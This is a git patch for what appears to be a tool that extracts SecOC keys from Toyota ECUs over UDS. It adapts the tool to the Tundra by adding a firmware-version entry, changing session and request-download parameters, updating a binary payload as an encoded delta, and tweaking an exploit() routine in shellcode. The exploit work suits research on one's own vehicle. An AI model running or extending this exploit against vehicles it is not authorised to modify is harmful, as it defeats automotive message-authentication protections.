From b80d9104a14bdf59d236a6a0de2a4a5c929a9d76 Mon Sep 17 00:00:00 2001
From: Willem Melching <willem.melching@gmail.com>
Date: Sun, 13 Jul 2025 23:15:42 +0200
Subject: [PATCH] make it work for the tundra

---
 extract_keys.py  |  13 ++++++-------
 payload.bin      | Bin 4096 -> 4096 bytes
 shellcode/main.c |   2 +-
 3 files changed, 7 insertions(+), 8 deletions(-)

diff --git a/extract_keys.py b/extract_keys.py
index 1afbd63..04668b6 100755
--- a/extract_keys.py
+++ b/extract_keys.py
@@ -28,6 +28,7 @@
     b'\x018965B4209000\x00\x00\x00\x00': b'\x01!!!!!!!!!!!!!!!!', # 2021 RAV4 Prime
     b'\x018965B4233100\x00\x00\x00\x00': b'\x01!!!!!!!!!!!!!!!!', # 2023 RAV4 Prime
     b'\x018965B4509100\x00\x00\x00\x00': b'\x01!!!!!!!!!!!!!!!!', # 2021 Sienna
+    b'\x048965F3401200\x00\x00\x00\x008A3113402000\x00\x00\x00\x008965F3402200\x00\x00\x00\x008A3213402000\x00\x00\x00\x00': b'\x04!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!',
 }
 
 KEY_STRUCT_SIZE = 0x20
@@ -61,7 +62,7 @@ def get_secoc_key(key_struct):
     panda = Panda()
     panda.set_safety_mode(CarParams.SafetyModel.elm327)
 
-    uds_client = UdsClient(panda, ADDR, ADDR + 8, BUS, timeout=0.1, response_pending_timeout=0.1)
+    uds_client = UdsClient(panda, ADDR, ADDR + 8, BUS, timeout=0.1, response_pending_timeout=1.0)
 
     print("Getting application versions...")
 
@@ -82,8 +83,6 @@ def get_secoc_key(key_struct):
     uds_client.diagnostic_session_control(SESSION_TYPE.PROGRAMMING)
 
     # Get bootloader version
-    uds_client.diagnostic_session_control(SESSION_TYPE.DEFAULT)
-    uds_client.diagnostic_session_control(SESSION_TYPE.EXTENDED_DIAGNOSTIC)
     bl_version = uds_client.read_data_by_identifier(DATA_IDENTIFIER_TYPE.APPLICATION_SOFTWARE_IDENTIFICATION)
     print(" - APPLICATION_SOFTWARE_IDENTIFICATION (bootloader) ", bl_version)
 
@@ -113,7 +112,7 @@ def get_secoc_key(key_struct):
     print("\nPreparing to upload payload...")
 
     # Write something to DID 203, not sure why but needed for state machine
-    uds_client.write_data_by_identifier(0x203, b"\x00" * 5)
+    uds_client.write_data_by_identifier(0x203, b"\x01\x00\x00\x00\x00")
 
     # Write KEY and IV to DID 201/202, prerequisite for request download
     print(" - Write data by identifier 0x201", DID_201_KEY.hex())
@@ -126,7 +125,7 @@ def get_secoc_key(key_struct):
     data = b"\x01" # [1] Format
     data += b"\x46" # [2] 4 size bytes, 6 address bytes
     data += b"\x01" # [3] memoryIdentifier
-    data += b"\x00" # [4]
+    data += b"\x01" # [4]
     data += struct.pack('!I', 0xfebf0000) # [5] Address
     data += struct.pack('!I', 0x1000) # [9] Size
 
@@ -155,7 +154,7 @@ def get_secoc_key(key_struct):
     # [5] 0x0
     # [6] mem addr
     # [10] mem addr
-    data = b"\x45\x00"
+    data = b"\x45\x01"
     data += struct.pack('!I', 0xfebf0000)
     data += struct.pack('!I', 0x1000)
 
@@ -172,7 +171,7 @@ def get_secoc_key(key_struct):
     # [5] 0x0
     # [6] mem addr
     # [10] mem addr
-    data = b"\x45\x00"
+    data = b"\x45\x01"
     data += struct.pack('!I', 0xe0000)
     data += struct.pack('!I', 0x8000)
 
diff --git a/payload.bin b/payload.bin
index 24580bad9973c540319da52f1ec7b2916380542d..fda79ae1d57df498d109f119bea6a4312001d6d1 100644
GIT binary patch
delta 4038
zcmV;%4>|CFAb=o{V1Km?$Ox<Fj0OkY%7aA_EsxG;gW_5jGp{1+|IZ?^MmP=_7etZV
zPZ}Qhh;u+X?XDf)zh@pY($G#-vDcVJwe3w)f+7iVcn@l70(N%W+u>d$AT<H&REdIb
zqQU%6XdO~jNomi~A!0CCoT~ls^<K>O;jt3l)pcxM60(ibt$!};mx~_@3spTsG6V4+
zrfXhmSjB(H53`j3Ql}xpHoM%c(1iB%?Pt;a#1NlNwi*k;_NBkU6bAPk;oQr7X1;Yy
z`fJ^y?|Q7ps~?75m!<UOGR8%KK>Zy(mE})5IoVPBzo)^W*jM;PD`Xn7Z+mE)N83!>
z{(e(y<}5J2P=E0)fbk73!TjSNE}21}2&OaF)4|f)$EPt6GJrn53^y^0n|69JbR?lz
zoN=nXwi4E-xj)kH;>fs89wcU-j8DL<JOtj{r1~&XSn(wEFR4NUzkm?6JA{&wmvf|1
zv2*)xA;^-#_oT3m)!QZXUJai{ZOZQOafmyg=4iqdCx4_T+|dd`e!jz938V>-u9-X_
zDpsrEWL>H}68{VOJ1^{L3a^%iZ<h4NdUaLq?Qq`^`J^{@T}2@a&ZwiQDm!Y*V0b=*
zLoroH-wpK<sw#9cOg7e}q-mohb<c_MOa-!OWcx2GaGRAqpKr>d3G#5H;e|&28wJq`
z#*?sI^nW5S6FqS|&T6xp6j8+QQ!#=)+n^qu>v*m!GZbP(SA2^@8gb56k)W0o8r#^M
zziiVb819Nq#y@-((!+k+n67(`=^^Wg?v1Z)=8Five(ua4i=&pH$zgt;U-<|=#Re9_
zyJ;zqqS{npOyQGaP>D3pz-ZQRcsM!I2~pZmf`5n`<RNV+fJOH!ig03oBB)swLKlr3
zb6;~Z|Bj6d5gfa!t%6JV(u+2<Vy_Dge$df!VIRZ6S{%c!AJmogc@#BN!8BFgNPj(W
z0NqyF*b&D?IqR$uw2uQ~>X<bnA$wO|ymAfYyg?rE<X^p$|1pf81j7n63e}T_a>`M4
z0e^;9vs4ueFG`a~OoOAIJ|)zeX!iP&rZ5yzi<Xtw>sRp&CRrd9itCR3O$hntQ-0?%
zHisMt8O9!IYB_?YEl|{|pZ^zP@6+A#58;k!xggTZ=nC{=#P;}MgileXCKnoz5vC=4
zE!pn(QF`-w4CZV6Q^p8~*}5cKKrD9zL4T;rM#<R^--}&_3C!2WV|J6M&vz-j=K@1S
z2Pv!zo^)tEC#!^^=Vq+bQ%jJl@&XPI)wL9g(;!q~zlc@Sar*amdWII7j%At6#O&U1
zoMn+#Uj~&g#jx{o^qYcH=!O0A<<*mU)<$$`U0mzyzz^c0oAIPO8&<s_uiY5d|9^Qw
z!@2DWli~`+(6EBQ)zVE0G<Bn>e_klzNfIhA<A_p0NEt~7OnENk;h%&4>;CSy+SD||
z_|+Z!7Gp$EHAKgbu3jNaIR~LtqiQ&zGZNcuwPh(o_%^JRp0{nB#5yZ%;F?GbB_+eF
z@mgS-c`OpDvsQ|3H@xBiJznY4v40zixNeQvVQH8V4|3I@QL}v^fNhvR3au+}du8Cq
zT!?73j3l&>#{fL!&Bw^{Ur?;2zdpd~;J1Nb>M7>K8ao2wa|*CF%)=zYB<U*P{#O1?
zE4TXngGiN^tG7$v)-r|~Izjm&GB2PakYpNcX;7wO%|IHYBso6Wu7H|p_<t(rD595+
z)_fa|*s^u!`|CF$MW3co2)CCv-by=!m0dUBxDOF)aSp*4+u~Rxoi*P3WVHW;inw`v
z$fK*r<;u9R5UO<Nae9F<Lz^KeJk=3U-}O7lwN2a)`Uf2681WKyOEtyE2dmwTx2eqc
zblD`BwLILQw*c2UGZFM{Uw^?DBd<Z&5uJ8ONiDb?UT(;m1rBRCEB&OChzsZ!7U!mm
zpKcFAbCwpUU6!&v%48I+e!T+-=L&(js7p-8do=9ozb}R|Z`{nc*dS3udh(^D$Z2`+
z04tb_oI?fA7v*NyGDu(@;li-<gf|pAz1Ly)UrExq_M5oV%+$h^-ha3lNz;R`yDjHc
z6vN_WJBQgOxU8-dDqHgS@!U?R7@a=TZu8*AiOGSoMcucsaX$4v<DR<}q)c<*0b1+8
z(^U~4rp&_s{l(*AL}tCN*rztPw45UbSVG)e3ORmJ3^Dxj`w0KJNIOU_eGe1O@l3Vk
zhErw%P@+=3>32x(0e@gvf)bwb6n4FOA`H~AAYuo0x?4&5$+sY)Gz%py^dvE{dPDL{
zt;?YDsvXM`2Itc|lsdXu|I=1i7%tAFLYFl*I8G%7>mH!Bv2;N{yQI#@$;q#d19f&`
z0~(2lLQB3!VZ8)5a;u0ZhTQexK29y$RRXMLlz%*bQn;oR?0+@m=M0!>*w&^1bO-<h
zG!pxQ8VX6h4qJWB*M>lmmyyl~>H9zjYu-T>rgcmtY1F)tWACQ>GN4({Y6nXb{%?=h
zZN#>&ac(vOjVlnOJ1;F+&A67@GKIXS8KP+Y{f7Kz3WIA=)`sq_!jsgrFR|$>CL)0~
z2^`{mDn$!I-+!U~Wo|%?r_g?7>a5zSig#(tfj*(Gs%x=hV(yzvQPwx9BpXfsO21YY
zf;929jzj2gMjw-A3ilJ$*W6r}lpGl)bjtVJdaQ>cOT9-bh_rSloO358&M&f#L?H@@
zAB@*kgdOE+n(I0uo>X!c;VBDTjqsrXbSG1HU}`XajDIXGKMpQW2j=)_B#I;^OE|K&
z#>r`eX-G6-xs6v|5&Q3}q_Z>EFcu09j0^LQR!{HelyzrBKY^7`5}d*-qmv1qU?hi>
z6X9gEa!$#rS!3P2Ps8n<yp7lU`xS!(w+D71Pm^kEQ_G1*A_LUFW(W#vLB)5OJ$}hL
z%7}569Dlovt6#`TTmRZ&wJs`*YuHuWxOeq9XQ#F_=}1XbpJP#50`^`>;($XoU?tUh
zxq(P<lAq1%LmnjYp3%Iy=v<k@*0}664IAjkIo5?31-p%RYK*;CyKWb1B(U0UF$HM=
zfhf)Hv9Q?I;is|?MtgZ~QA5=j@=oPs&cdGCV1Mj7Nta0L6V$dFg?g64Hu8lW=O3O0
zGyx~PHbN@p{VOJHR#}2a%CM<l!f=VeU|&ihi53d{P1}R3gVf4fsnpLepu-@$B!LLb
z1NcZueT~fE(1A0zXuFc(Tmdc49q=3a=8wTb6j+_h21vYq53l7E;C_j@-nNZYS{bPl
z{eRuAai2oz{b`>GYGzYkV>dHIVvp+R3DYz>IAMO@2~(SK+NZk;I;*HzcmH;2!?V_^
zV@pbm3Qs^sx=FsCbM2K!TCl2&=#G&xE#z2`-U5LG$U$vmO=a<0?8@L(9ohP`G_(kl
zkb6NhtyMNMT%c6|n<M2pMmL{x=KElKD1X_tLBdM%a@%*QaNK6guP_xcRvueP^}^<B
zLQ)DMZPBtaQ=Mgts^_yb2_4xta<NMKhE|nf1CFdI(8N>TsfT7hynL+D(FXNALD8vb
zz&dxd(A83nX%Wk7SA1H0It8K3%TejwFuKzXQ!{b6dI}Y=K=12(v4HIgNuT_m`+xEH
zJ1An229XG~bId{D<-Gu1Rr2)G3Egl(>DR!7`K=I76it=x+qZrhY$HQ^9OdH3z4`&H
zZQ}Tvs;rjdLTp3H%uIa1bNC9S$dbQvD(uFy!4H7aY2cn|6#V1H!?s1T_JUo-z!Ikv
z93}u~tdN-a@-0g>BgIc*|LU>VtA7Bm7~;QO-QdojDufhwQ`3lTe};|y)~FPmu|2l!
z)cR<~I%qHNwhJ6}jTz~4ShCaWS-&d#K;Uq3a35%GbI<B3a9^0=I;O$sl{y!PIvTvs
z3!dB5)L9=THQbH~4(rU;VgLwAKJ)uv+f3Z&iA)YA-m)cUU?t;niRE=IVSjOi!uo(H
z@<d>DLne(pqtJAHQu$F8s2QKIj-&BR<f8R|z@X$7V__W!y_N^u>+ovHo&;)Cw0SW+
zsiX**&D0&!`IYhj%aE|0&X35)C<&D3@e#YoOF!Ck%`Z@IT>{AC5;!xs`*dG^ObU<K
zbrjV3pOo;;f1uL80BmbwbbpblvlgTGM8|_&6cJ*c^cHD<<jiReE<QhdIjor@VWQNw
zcK6TM9>N3c^1OgYY#aIQ`$*&1-?A|03zd>0RwsTl=G<7ow566V5umOpCI>x{@0IpD
z&n~$tzFf@{SAltr1tDl0A{P5)6!o-4l}cpiEk`UENxN;IYRxs~?|)hi2lR?SI#ZIy
zz=PCR1+X?@qR}?$kHp0iOX>a<sg)RTujMSP^NsBjj9FUo)<|;&fL8!57x4q6SzmC#
z8XhG?@1+oaT0YdT-jc|rd1Vmfjc2CVCdFE`XYL&!fp>u?KD{87{#lsrL+%G=^v)Q9
zF#%8CK2S3Cj;JgjEPu-3>L@^>#A0WFa-$#%glK|dTO?2V>|y`E|G?V@Lr-pe;m(%B
zCnIDNZ-lPGhZm0?0k6>?tMR^mZ7l`+LQjy!n!n=C4GMwD7pP#YARzE`7>&a)NsP62
zvuhL;5poC4<j#tiKO-ym2`<6w*|4k^!;@JpHG*MhJnWYIPk(4z|BgQmwYqggdgb?K
z@{z{{5JWjTr+&#`K*VBFh+8c?#Unt!m66@);Q*q>9CG3Z6<1VvTz@&kkwCLL+|wkA
zMRTm4?oIa2d&KFTi?I!5OTt{-J_yB6MOK8Z#~<*L)qfvnS}%`V`_}@U{%8{NVyOoO
z>Z|u4dYgstwtsTx?20j{0Qhx8=m;K5<!Hg1pmT>Mz#3`%VZH!T{oXUSy0y4t?t$0W
zB~yrqnY5@<m{ZWL93b<|VyD@}X%0SW%%0U#Gl;CDi&dOsqqZzYyT9rAtDbwP!=g3k
z!DrSLfdX|4s%axVQy*oAR~Cx`Ie~>EHi{6oyegbFt$&?IOJQ(f_hCkjZ&q>vwYV7+
ztS${cCVdx*fUkx6v~cGK)VO$@k!+mkAFOv+iqy2mj}8^a;OvpjWxd`}0a(D;mpfJ3
zD3!6gi+lMgLa^$Lrf1nf_QTcIi+jPZt3cHeCa{@~i|xUka<hwJVblyMA>9QYb3u({
z@eP8&x_`|Mc4Nk&O@5LwUJ2)_s|6fXE0l<%9O;Z|Z&L7G5ueW4>fDrA$uh1!JOJ|w
zR)|@FG1+1Jq&B47p*+_<rWLOMx3||j0QHt-uxRi0coOG%N&j<Nq#4g%ng>*7WMnBI
zN+5E=&O?;jgL;65j}@`0OLZ~zF9<wHOd|byl|PcXQJtpuzzChU-m6{J=kYMM9&5)W
sDSN?j_RUO~6TDU=s?`;Z@|4JMX|D4W2Fn<+nDW<@_7j}oDIf~FZ8yE()c^nh

delta 4038
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

diff --git a/shellcode/main.c b/shellcode/main.c
index ae529de..84237b0 100644
--- a/shellcode/main.c
+++ b/shellcode/main.c
@@ -12,7 +12,7 @@ void exploit() {
 
     int *addr = 0xff200000;
     while (addr < 0xff208000) {
-        int i = 0x10;
+        int i = 0x0A;
 
         if ((*(RSCFDnCFDTMSTSp + i) & 0b110) != 0) {
             continue;